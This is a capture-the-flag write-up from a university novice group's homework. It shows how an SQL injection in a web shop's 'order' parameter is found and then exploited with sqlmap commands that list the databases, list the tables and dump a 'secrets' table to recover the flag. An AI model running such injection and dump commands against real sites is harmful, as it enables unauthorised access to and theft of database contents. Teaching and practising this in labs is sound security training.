CrySyS Novice Group - Sorting Fruits writeup (1)

This task was given as homework in the CrySyS Novice Group. It was under the “Shop of Quality Lime (and other fruits)” group and was worth 50 points (first level).

Description: This is the first version of our website. We believe it is absolutely secure, but you can prove us wrong.

I’ve got an address (let’s say it was http://someaddress.com), and on that site there was a table like this:

id name description price
1 Kiwi Green 15
2 Apple Yummy 10
3 Water Mellon Green 30
4 Potato For french fries 40
5 Ananas For pizza 5
6 Secrets are in an other table 100

In this table the items are organised by their id, if I clicked on any other category they were reordered with respect to the category I clicked. To tell the web server which order is chosen a GET request was sent where an ‘order’ variable was defined, for example if ‘id’ was chosen it looked like this:

http://someaddress.com/?order=id

So I quickly checked for the possibility of an SQL injection by adding an extra apostrophe at the end of the address like this:

http://someaddress.com/?order=id'

This caused the following warning message:

Warning: mysql_fetch_row() expects parameter 1 to be resource,  
boolean given in /app/index.php on line 23

Now I know that SQL injection might be possible since the input is clearly not handled properly. There is a hint on the site which says that Secrets are in an other table, so we need to find that table and than dump its data.

For this job I used sqlmap. To dump the names of the databases I typed in the following (the --threads argument is optional, it just makes it much faster):

python sqlmap.py -u "http://someaddress.com/?order=id"  
--dbs --technique="B" --threads 4

This gave me the usual mysql databases plus an extra one called test.

available databases [4]:  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] test

Now I needed to find out the names of the tables in the test database.

python sqlmap.py -u "http://someaddress.com/?order=id"  
--technique="B" --threads 4 -D test --tables

I got this:

+----------+  
| products |  
| secrets  |  
+----------+

And finally I dumped the data of the secret table.

python sqlmap.py -u "http://someaddress.com/?order=id"  
--technique="B" --threads 4 -D test -T secrets --dump
+-----------------------------------------+
| secret                                  |
+-----------------------------------------+
| OUR_APPLE_IS_NOT_AS_YUMMY_AS_ADVERTISED |
+-----------------------------------------+

And here it is, we got our flag.

To read about the next level click here: Sorting Encrypted Fruits

If you liked this post, you can share it with your followers or follow me on Twitter!
comments powered by Disqus